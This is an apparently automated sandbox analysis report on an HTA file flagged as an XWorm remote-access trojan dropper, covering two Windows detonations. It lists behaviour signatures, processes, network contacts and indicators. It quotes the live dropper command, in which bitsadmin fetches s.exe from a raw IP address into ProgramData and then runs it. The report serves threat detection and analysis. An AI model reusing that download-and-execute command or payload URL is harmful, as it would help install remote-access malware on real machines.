Malware Analysis Report

2025-08-05 19:41

Sample ID 240402-wrfpaahc93
Target e81963d4c5a431f529c7669d3595a943.hta
SHA256 cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b
Tags
xworm rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cf6cab6b405f7e849e6585f6f4c1ae3fd155b75d8ceb197bd0cf46a9b4c5f91b

Threat Level: Known bad

The file e81963d4c5a431f529c7669d3595a943.hta was found to be: Known bad.

Malicious Activity Summary

xworm rat trojan

Detect Xworm Payload

Xworm

Downloads MZ/PE file

Checks computer location settings

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Download via BitsAdmin

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-02 18:09

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-02 18:09

Reported

2024-04-02 18:11

Platform

win7-20240319-en

Max time kernel

119s

Max time network

123s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Downloads MZ/PE file

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2610426812-2871295383-373749122-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\s.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2000 wrote to memory of 1164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2000 wrote to memory of 1164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2000 wrote to memory of 1164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2000 wrote to memory of 1164 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2000 wrote to memory of 2828 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe
PID 2000 wrote to memory of 2828 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe
PID 2000 wrote to memory of 2828 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe
PID 2000 wrote to memory of 2828 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta"

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe

C:\ProgramData\s.exe

"C:\ProgramData\s.exe"

Network

Country Destination Domain Proto
TH 210.246.215.82:80 210.246.215.82 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/2828-0-0x0000000001140000-0x000000000119A000-memory.dmp

memory/2828-1-0x000007FEF5890000-0x000007FEF627C000-memory.dmp

memory/2828-2-0x000000001B430000-0x000000001B4B0000-memory.dmp

memory/2828-3-0x000007FEF5890000-0x000007FEF627C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 18:09

Reported

2024-04-02 18:11

Platform

win10v2004-20240226-en

Max time kernel

147s

Max time network

155s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\ProgramData\s.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5024 wrote to memory of 1924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5024 wrote to memory of 1924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5024 wrote to memory of 1924 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 5024 wrote to memory of 4260 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe
PID 5024 wrote to memory of 4260 N/A C:\Windows\SysWOW64\mshta.exe C:\ProgramData\s.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\e81963d4c5a431f529c7669d3595a943.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

C:\Windows\SysWOW64\bitsadmin.exe

"C:\Windows\System32\bitsadmin.exe" /transfer 8 http://210.246.215.82/s.exe C:\ProgramData\s.exe

C:\ProgramData\s.exe

"C:\ProgramData\s.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
TH 210.246.215.82:80 210.246.215.82 tcp
US 8.8.8.8:53 82.215.246.210.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 28.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 73.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/4260-0-0x0000000000FE0000-0x000000000103A000-memory.dmp

memory/4260-1-0x00007FFAD55B0000-0x00007FFAD6071000-memory.dmp

memory/4260-2-0x00000000030C0000-0x00000000030D0000-memory.dmp

memory/4260-3-0x00007FFAD55B0000-0x00007FFAD6071000-memory.dmp